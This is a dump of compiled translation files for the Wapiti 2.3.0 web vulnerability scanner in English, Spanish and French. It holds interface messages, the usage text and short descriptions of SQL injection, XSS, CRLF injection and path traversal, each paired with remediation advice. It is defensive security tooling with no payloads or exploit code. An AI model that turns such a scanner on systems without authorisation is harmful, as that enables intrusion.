respond to a query. An attacker might leverage this kind of weakness to overload the serverThe involved script is maybe using the server resources (CPU, memory, network, file access...) in a non-efficient waySQL InjectionSQL injection vulnerabilities allow an attacker to alter the queries executed on the backend database. An attacker may then be able to extract or modify informations stored in the database or even escalate his privileges on the system.To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, user input must be escaped or filtered or parameterized statements must be used.Scan stopped, the data has been saved in the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}Wapiti-2.3.0 - Web application vulnerability scanner Usage: python wapiti.py http://server.com/base/url/ [options] Supported options are: -s --start To specify an url to start with. This option can be called several times. Wapiti will browse these links to find more URLs even if the specified link is not in the scope. -x --exclude To exclude an URL from the scan (eg: logout URLs). This option can be called several times to specify several URLs. Wildcards (*) can be used in URLs for basic regex. Example : -x http://server/base/?page=*&module=test or -x http://server/base/admin/* to exclude a directory. -p --proxy To specify a proxy. Currently supported proxies are HTTP and HTTPS. This option can be called twice to specify the HTTP and the HTTPS proxy. Example: -p http://proxy:port/ -c --cookie To import cookies to use for the scan. The cookie file must be in JSON format. Cookies can be grabbed using the cookie.py and getcookie.py utilities (net directory). -t --timeout To set the timeout (maximum time in seconds to wait for the server to send a response). -a --auth Set credentials for HTTP authentication. --auth-method If the server requires an authentication, set the authentication method to use. Currently supported methods are (some requires additional modules to install): + basic + digest + kerberos + ntlm -r --remove Remove a parameter (name and value) from URLs. -n --nice Define a limit of URLs to browse with the same pattern (ie, the maximum number of unique values for the same parameter). Use this option to prevent endless loops during scan. Limit must be greater than 0. -m --module Set the modules (and HTTP methods for each module) to use for attacks. Prefix a module name with a dash to deactivate the related module. To only browse the target (without sending any payloads), deactivate every module with -m "-all". If you don't specify the HTTP methods, GET and POST will be used. Example: -m "-all,xss:get,exec:post" -u --color Use colors to highlight vulnerabilities and anomalies in output. -v --verbose Set the verbosity level. 0: quiet (default), 1: print each URL, 2: print every attack. -b --scope Set the scope of the scan: + page: to analyse only the page given as the root URL. + folder: to analyse all the URLs under the root URL passed to Wapiti (default). + domain: to analyse all the links to the pages which are in the same domain as the URL passed to Wapiti. -f --format Set the format type for the report. json: Report in JSON format html: Report in HTML format (default) openvas: Report in OpenVAS XML format txt: Report in plain text (UTF-8) vulneranet: Report in VulneraNET (XML based) format xml: Report in XML format -o --output Set the name of the report file. If the selected report format is 'html', this parameter will be used as a directory name. -i --continue This parameter indicates to Wapiti to resume the previous scan saved in the specified XML status file. The file name is optional, if not specified, Wapiti takes the default file from the "scans" folder. -k --attack This parameter indicates to Wapiti to resume the attacks without scanning the website again, loading the scan status from the specified file. The file name is optional, if it is not specified, Wapiti takes the default file from the "scans" folder. --verify-ssl <0|1> This parameter indicates whether Wapiti must check SSL certificates. Default is to verify certificates -h --help To print this usage message {0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}wapiti-2.3.0+dfsg/wapitiCore/config/language/es/000077500000000000000000000000001240201516300214675ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/es/LC_MESSAGES/000077500000000000000000000000001240201516300232545ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/es/LC_MESSAGES/wapiti.mo000066400000000000000000000546471240201516300251260ustar00rootroot00000000000000,< %      )7GYap+b' 5Rjo !3 Hi  1D Xfu -$9&7`7% 3$#X |!6%U{)&DT&r6,8M&h#"  ")9 No <  "/HeOvNOiehi80G2:?DS%i +: 9D:~]'%?ez")!: Q [ e s-,-& %0 V f | , "M"b" t"" " """"""" #+!# M#n##n#0$?$DQ$%)o&&&'((+(*I*$C+h+~++h&,,,,P- 0030L0(^00.0000121D1294)4=5@W5@5)56 66>65^6(66$666m78.8tI8X8-9)E9o9999/99! :+:0<:;m:9:::3;9;T; j;A;l;):<!d< <#<<<<<=>#>?I?*@D@T@p@@g@hAhoAnAoGBmB5%C[CKsCCCCCC%D'D 6DCD4SDDDFDGDG;E`E4E.FHF^FwF&F.F*F$G6G NGXG jX xX3X4X4X,#Y-PY~YY|x"lB P?V^4\)w_A0Y.L>=8gkb}!1t: ,]#%[Ce7-(Z/oJ rf yi~Enus3QT;Sh9&IKR+paczUW<M${v 2F`6mDd@jXN5'* qHOG .htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLFCRLF descriptionCRLF injectionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been savedin the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: 2013-09-17 23:16+0200 Last-Translator: David del Pozo Gonzalez Language-Team: David del Pozo Gonzalez Alberto Pastor Nieto Language: Spanish MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Vulnerabilidad de bypass de .htaccess: {0} URL maliciosa: {0} viniendo de {0} * Inputs: * Método: {0} * Selects: * TextAreas: * URL escaneadas * URLs a escanear Aviso(QUERY_STRING)+ attackGET {0}+ attackPOST {0} de {1}Inyección .NET SQLSe ha generado un informe en el fichero {0}Inyección SQL en sistema AccessInyección Acess-Based SQLAnomalias encontradasProceso de ataque interrumpido. Para realizar el ataque de nuevo lance Wapiti con los parámetros "-i" o "-k".Vulnerabilidad de 'Local file disclosure' en BSDFichero de backupEs posible que se encuentren archivos de backup de los comandos ejecutados en el servidor que el administrador dejó para guardar una versión anterior o archivos de copia de seguridad que se generan automáticamente por editores de texto (como por ejemplo, Emacs). Estas copias pueden revelar código fuente o contraseñas.El administrador necesita borrar la copia de seguridad o moverla fuera de los directorios de la aplicación web. También debe desactivar las copias de seguridad automáticas en la configuración del editor de texto.Fichero de backup {0} encontrado para {1}Inyección SQL a ciegasLa inyección SQL a ciegas es una técnica que se aprovecha de una vulnerabilidad en la base de datos de la aplicación. Este tipo de vulnerabilidad es más difícil de detectar que una inyección SQL clásica ya que no muestra ningún mensaje en la web.Para proteger una aplicación de una inyección SQL, el usuario no debe utilizar consultas SQL directamente en el código. Los parámetros suministrados por el usuario deben ser escapados y filtrados. Las consultas deben estar parametrizadas.Inyección SQL ciegaCRLFEl término CRLF se refiere a 'Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n)' (en inglés). Esos caracteres se utilizan para indicar el final de una línea, sin embargo no todos los sistemas operativos los interpretan de la misma forma. Por ejemplo, en Windows, ambos, CR y LF son necesarios para marcar el final de la línea, mientras que en Linux/UNIX sólo LF es necesario. La combinación de CR y LF es usada por ejemplo cuando se presiona 'Enter'. Dependiendo de la aplicación, presionar 'Enter' crea una nueva línea o ejecuta un comando.Inyección CRLFComprobar los parámetros suministrados por el usuario y filtrar CR y LF.Elige el formulario que deseas usar:Ejecución de comandoEjecución de comandosEste ataque consiste en ejecutar comandos del sistema en el servidor. El atacante trata de inyectar comandos en los parámetros de la petición.Se debe evitar utilizar parámetros suministrados por el usuario en las llamadas al sistema de ficheros.Conexión rechazada!Cross Site ScriptingCross-site scripting (XSS) es un tipo de vulnerabilidad que normalmente se encuentra en aplicaciones web que permiten la inyección de código malicioso en páginas que son vistas por otros usuarios. Un ejemplo es la inyección de código HTML y javascript.La mejor forma de proteger una aplicación web de ataques XXS es asegurarse de que la aplicación valida todas las cabeceras, las cookies y todos los campos de los formularios (visibles y ocultos) que son enviados al servidor. También se debe validar toda la información que se manda al usuario desde el servidor para evitar que scripts inyectados puedan ejecutarse en los navegadores de otros usuarios. Una buena forma de proteger aplicaciones web de este tipo de ataques es convertir los siguientes caracteres en su equivalente en HTML: <, >, &, ", ', (, ), #, %, ; , +, -.Inyección DB2Fecha del escaneo: {0} Descargando de la web...Elige un número:Error descargando la base de datos NiktoError recuperando la URL {0}Error: El servidor no entendió esta peticiónEvalutation warningPetición maliciosa:Petición maliciosa: Excepción en lswww.browse: {0}Manejo de ficheroEste ataque también se conoce como 'Path Transversal' o 'Directory Transversal'. Su objetivo es acceder a ficheros y directorios que se encuentran fuera del directorio de la aplicación web. El atacante es capaz de acceder a los directorios del servidor utilizando distintas técnicas como por ejemplo la manipulación de variables que referencian a ficheros con secuencias de '../' para moverse por los directorios del servidor.Evite trabajar con información suministrada por el usuario cuando haga llamadas al sistema de ficheros. Use índices en vez de nombres o partes del nombre de los ficheros. Por ejemplo, utilice idioma=5 para acceder a la página en sueco en vez de utilizar idioma=sueco. Valide todos los parámetros suministrados por el usuario chequeando una lista de valores posibles. Utilice 'chrooted jails' y restrinja el acceso de los ficheros adecuadamente.Vulnerabilidad de 'Local file disclosure' en include_pathArchivo {0} cargado, el escaneo continua:Archivo {0} cargado. Wapiti lo usará para realizar el ataqueFichero {0} no encontrado, Wapiti escaneará el website de nuevoArchivo {0} no encontrado. Wapiti escaneará el website de nuevoEl primer argumento debe ser la URL raízFormulario {0}FormulariosInformación de los formularios¡Encontrado fichero de backup!Encontrado XSS permanente atacando {0} con campos {1}Encontrada XSS permanente en {0} con {1}De: {0}Protección HtAccess encontrada: {0}Bypass de HtaccessLos ficheros htaccess se usan para restringir el acceso de algunos ficheros o métodos HTTP. En algunos casos, es posible saltarse esta protección y acceder a los ficheros.Asegúrese de que todas las llamadas HTTP se prohiben en el caso en el que las credenciales sean incorrectas.Inyección InterbaseError interno del servidorUn error en el servidor que evita que se procese la petición puede ser una señal de que existe una vulnerabilidad.Investigue los logs del servidor en busca de información más detallada sobre el error.Argumento inválido para la opción {0} : {1}En argumento no es un enlace válido: {0}Protocolo inválido: {0}Parámetro involucrado: {0}Inyección Java.SQLInyección LDAPVulnerabilidad 'Local file disclosure' en LinuxInyección MSSQLCompruebe que la URL es correcta.Inyección MySQLNo se han encontrado formularios en esta páginaNo se han encontrado enlaces ni formularios en esta páginaAbrir {0}/index.html con el navegador para ver el informeInyección OracleEvaluación PHPPor favor, introduce valores para este formulario: Posible vulnerabilidad {0}Inyección PostgreSQLFichero potencialmente peligrosoUn fichero con vulnerabilidades se ha encontrado en el sitio web.Asegúrese de que el script se encuentra actualizado y de que sus permisos son lo más restrictivos posible.Problema con la base de datos local NiktoRecibido un error HTTP 500 en {0}Referencias:Vulnerabilidad de inclusión remotaInformeInforme para {0} Consumo de recursosAl servidor le llevó más tiempo de lo normal el responder a una consulta. Un atacante puede utilizar esta debilidad como un arma para sobrecargar al sistema.El script en cuestión puede que esté utilizando los recursos (CPU, memoria, acceso de ficheros, base de datos…) de una manera ineficiente.Inyección SQLLas vulnerabilidades SQL permiten al atacante alterar las queries que son ejecutadas en la base de datos.El atacante puede extraer o modificar la información de la base de datos o incluso obtener más privilegios en el sistema.Para protegerse de inyecciones SQL, los parámetros de usuario no se deben utilizar directamente para la crear la sentencia SQL. Esos parámetros se deben escapar o filtrar. Las consultas deben estar parametrizadas.Escaneo detenido, la información se ha salvado en el archivo {0}/{1}.xmlÁmbito del escaneo: {0} Código fuente:Guardada vulnerabilidad XSSResumen de vulnerabilidadesInyección SybaseTimeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en el parámetro {0}Timeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en la query de la URLTimeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en la ruta al recursoEl servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en el parámetro {0}El servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en la query de la URLEl servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en el resource pathEste escaneo se ha guardado en el archivo {0}/{1}.xmlTimeout ocurrido en {0}Para continuar con este escaneo, debes lanzar Wapiti con el parámetro "-i"A: {0}URLsURLsSubida de scriptsScripts de subida encontrados:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Vulnerabilidad de 'Local file disclosure' en WindowsInyección XPathVulnerabilidad XSSVulnerabilidad XSS encontrada mediante inyección en el parámetro {0}Vulnerabilidad XSS encontrada mediante inyección en la query de la URLVulnerabilidad XSS encontrada mediante inyección en la ruta al recursoPuedes usarlo para realizar ataques sin escanear de nuevo el website mediante el parámetro "-k"[!] Dependencias no encontradas para el módulo {0}:[!] Imposible encontrar el módulo llamado {0}[*] Cargando modulos:[+] Lanzando módulo {0}cURL command PoC : "{0}"error: timeout mientras se atacaba {0}error: {0} mientras se realizaba el ataque {1}Vulnerabilidad highlight_file() en basedirinclude() de fichero en include_pathInyección preg_replaceurl = {0}Wapiti-2.3.0 - Web application vulnerability scanner Uso: python wapiti.py http://server.com/base/url/ [options] Las opciones soportadas son: -s --start Para indicar una URL con la que comenzar el escaneo. Esta opción puede ser usada varias veces. Wapiti escaneará esos enlaces para encontrar más URLs incluso si el enlace especificado no está en el ámbito. -x --exclude Para excluir una URL del escaneo (por ejemplo URLs de logout). Esta opción puede ser llamada varias veces para especificar varias URLs. Los comodines (*) se pueden usar en las URL como si fuesen expresiones regulares simples. Ejemplo : -x http://server/base/?page=*&module=test o -x http://server/base/admin/* para excluir un directorio. -p --proxy Para especificar un proxy. Actualmente los proxies soportados son HTTP y HTTPS. Esta opción puede ser llamada dos veces para especificar el proxy HTTP y HTTPS. Ejemplo: -p http://proxy:port/ -c --cookie Para importar cookies que se usarán en el escaneo. La cookie debe ser un fichero en formato JSON. Las cookies pueden ser generadas usando los programas cookie.py y getcookie.py (directorio "net"). -t --timeout Para establecer un timeout (tiempo máximo en segundo a esperar a la respuesta del servidor). -a --auth Establece las credenciales para la autentificación HTTP. --auth-method Si el servidor requiere autenticación, establece el método a usar en la autenticación. Actualmente los métodos soportados son (algunos requieren instalar módulos adicionales): + basic + digest + kerberos + ntlm -r --remove Borra un parámetro (nombre y valor) de las URLs. -n --nice Define un límite de URLs a escanear con el mismo patrón (por ejemplo, el número máximo de valores únicos para el mismo parámetro). Usa esta opción para prevenir bucles infinitos durante el escaneo. El límite debe ser mayor que 0. -m --module Establece los módulos (y métodos HTTP para cada módulo) para usar en los ataques. Prefix a module name with a dash to deactivate the related module. To only browse the target (without sending any payloads), deactivate every module with -m "-all". If you don't specify the HTTP methods, GET and POST will be used. Example: -m "-all,xss:get,exec:post" -u --color Usa colores para resaltar las vulnerabilidades y anomalias en la salida. -v --verbose Establece el nivel de logs por pantalla. 0: bajo (por defecto), 1: pinta cada URL, 2: pinta cada ataque. -b --scope Establece el ámbito del escaneo: + page: analiza solo la página pasada a Wapiti como URL raíz. + folder: analiza todas las URL bajo la misma URL raíz pasado a Wapiti (por defecto). + domain: analiza todos los enlaces a páginas que están en el mismo dominio que la URL pasada a Wapiti. -f --format Establece el formato del informe. json: Formato JSON format html: Formato HTML format (default) openvas: Formato OpenVAS XML txt: Informe en texto plano (UTF-8) vulneranet: Informe en formato VulneraNET (basado en XML) xml: Formato XML -o --output Establece el nombre del fichero con el informe. Si se selecciona HTML como formato del informe, este parámetro será el nombre del directorio donde se guarda el informe. -i --continue Este parámetro indica a Wapiti reanudar el escaneo previo guardado en el fichero XML especificado El nombre del fichero es opcional, si no se especifica Wapiti toma el fichero por defecto de la carpeta "scans". -k --attack Este parámetro indica a Wapiti reanudar los ataques sin escanear de nuevo el website, cargando el escaneo del fichero especificado. El nombre del fichero es opcional, si no se especifica Wapiti toma el fichero por defecto de la carpeta "scans". --verify-ssl <0|1> Este parámetro indica si Wapiti debe comprobar certificados SSL. Por defecto se verifican los certificados -h --help Para imprimir este mensaje de uso de la aplicación {0} : {1:>3} HtAccess {0}{0} en {1} mediante inyección en el parámetro {2}{0} en {1} mediante inyección en la query de la URL{0} en {1} mediante inyección en la ruta al recurso{0} mediante inyección en el parámetro {1}{0} mediante inyección en la query de la URL|Código HTTP: {0}|HTTP Code: {0} : {1}wapiti-2.3.0+dfsg/wapitiCore/config/language/fr/000077500000000000000000000000001240201516300214675ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/fr/LC_MESSAGES/000077500000000000000000000000001240201516300232545ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/fr/LC_MESSAGES/wapiti.mo000066400000000000000000000565501240201516300251210ustar00rootroot00000000000000 %    '9?N^x+b'F nz.= N!\~ ( FTl 1 %4 Sa{-$977W% 3# ;Edt!%:Uk)&16X, &'#N"r   . LZt= %O6NOi%hi0bG%)O ^k+{:9:>]y'%%:S"l)!   % 3-@,n-&% & ;< 4x!!! !! ! ! ""3"9"H"%X"~"0"$""o#+p###%)9&c&=|&'!(((yt*9*(+?+W+ ,(-=-R-k.z//!//+/ 0/$0T0 t00(00*0143'3C3K?4J4-45 5 5+5FJ525 5&5566777~y8)8+"9N9g999-99$9:4:2K:>~:::;:*;H;!];;>t<>=,= >,>H>P>"b>>$? ?S?1AQBnB BBBBgBeHCoCeDcDmD7VE1EDE FFFF*F%FFlFFF.FF F:F8/GBhGlG0H'IHqHHH<H%IA*I4lII I\I #\ 1\5>\3t\=\,\*]>]P]zv j@ N=\2Z'u]?.W,J<; ei`{/}r86 *[!#YAc5~&X-|H pdTwgClsq1OR9Qfm7$GIP)n_axSU:K"yt 0D^4kBb>hVL3%(+oFME .htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Note(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLF InjectionCRLF descriptionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been saved in the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE Last-Translator: FULL NAME Language-Team: LANGUAGE Language: MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Disfonctionnement dans la protection .htaccess : {0} Evil url: {0} en provanance de {0} * Intputs: * Méthode : {0} * Selects: * TextAreas: * URLs explorées * URLs à explorer Note(QUERY_STRING)+ attackGET {0}+ attackPOST {0} en provenance de {1}Injection SQL .NETUn rapport a été généré dans le fichier {0}Injection SQL sur système MS-AccessAnomalies rencontrées :Le processus d'attaque a été interrompu. Pour relancer l'attaque, lancez Wapiti avec les options "-i" ou "-k"Divulgation de fichiers sur un système BSDCopie de sauvegardeIl se peut que des copies de sauvegarde de scripts soient accessibles sur le serveur. L'administrateur web a du placer volontairement une sauvegarde dans l'idée de revenir à une précédente version ou involontairement en utilisant un éditeur configuré pour sauver automatiquement une copie après une certaine durée.Ces fichiers peuvent révéler des informations intéressantes comme du code source ou encore des identifiants (accès à la base de données).L'administrateur web doit supprimer manuellement les sauvegardes présentes sous la racine web et reconfigurer l'éditeur qu'il utilise pour désactiver les sauvegardes automatiques.Copie de sauvegarde {0} trouvée pour {1}Injection SQL en aveugleTout comme les failles d'injection SQL classiques, les injections SQL en aveugle permettent à un attaquant d'altérer les requêtes normalement exécutées sur la base de données. Ce type de vulnérabilité est plus difficile à détecter en raison de l'absence de messages d'erreur renvoyés par l'application web.Pour se protéger des injections SQL, les données fournies par les utilisateurs ne doivent pas être utilisées telles-quelles dans les requêtes SQL mais doivent faire l'objet de vérifications (filtres, échappements) approfondies.Faille d'injection SQL en aveugleInjection CRLFLe terme CRLF fait référence à Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). Dans le protocole HTTP, ces deux caractères à la suite permettent entre autres de passer à la ligne d'entête suivante.Un script qui insère directement dans ses entêtes des données fournies par l'utilisateur peut alors se voir injecter des lignes d'entêtes qui seront interprétées par le navigateur de la victime.Vérifiez que les couples nom / valeur retournés dans les entêtes HTTP ne contiennent pas la suite de caractères CRLF.Sélectionnez le formulaire que vous souhaitez utiliser :Exécution de commandeExécution de commandesCe type d'attaque consiste à faire exécuter des commandes sur le serveur. L'attaquant tente d'injecter les commandes dans les paramêtres de requêtes qui lui sont accessibles.Ce type de vulnérabilité résulte souvent d'un manque de vérifications sur les données soumises par le visiteur. Pour les opérations sur les accès fichiers il est préférable d'utiliser des appels systèmes spécialisés au lieu de tenter de faire exécuter des commandes shell.Connexion refusée !Cross Site ScriptingLe Cross-site scripting (XSS) est une catégorie de vulnérabilités web qui permet d'exécuter du code dans le navigateur des visiteurs du site. Leur exploitation peut par exemple permettre le détournement d'une session qui a été ouverte sur un site par un utilisateur valide.Afin de se protéger des attaques XSS, il faut s'assurer que les données retournées dans une page ne contiennent pas certains caractères interprétés par le navigateur.Certains caractères considérés dangereux peuvent être remplacés par leur code d'entité HTML.Injection SQL DB2Date du scan : {0} Téléchargement depuis le web...Entrez un numéro : Erreur de téléchargement de la base NiktoImpossible d'atteindre l'URL {0}Erreur : Le serveur n'a pas compris la requêteAvertissement d'une évaluationEvil request:Evil request: Exception reçue dans lswww.browse : {0}Divulgation de fichierCes techniques permet à l'attaquant d'accèder à des fichiers auxquels il n'est pas sensé accèder car en dehors de la racine du serveur web. En utilisant certaines séquences comme '../', il peut remonter dans l'arborescence pour ainsi lister des répertoires ou obtenir le contenu de fichiers.Ne laissez pas aux utilisateurs la possibilité de choisir une ou plusieurs parties du nom d'un fichier ou d'un répertoire. Générez vous même des noms aléatoire en cas de création ou utilisez des correspondances en cas de templates (un ID numérique correspondant à une chaine de caractères. Utilisez des jails chroot et des restrictions d'accès pour limiter le nombre de fichiers accessibles par le serveur.Divulgation de fichier présent dans le include_pathFichier {0} chargé, le scan continue :Fichier {0} chargé. Wapiti va s'en servir pour effectuer l'attaqueLe Fichier {0} n'a pas été trouvé, Wapiti va recommencer le scan du siteLe fichier {0} n'a pas été trouvé. Wapiti va scanner le site à nouveauLe premier argument doit être l'URL racine !Formulaire {0}FormulairesFormulairesCopie de sauvegarde trouvée !Un XSS permanent a été trouvé en envoyant les champs {1} depuis {0}Un XSS permanent a été trouvé dans {0} avec {1}Depuis: {0}Protection par htaccess trouvée : {0}Contournement de htaccessLes fichiers htaccess permettent de restreindre l'accès a des fichiers ou répertoires en fonction d'identifiants ou méthode HTTP utilisés. Si la configuration a été mal faite il peut être possible de contourner la 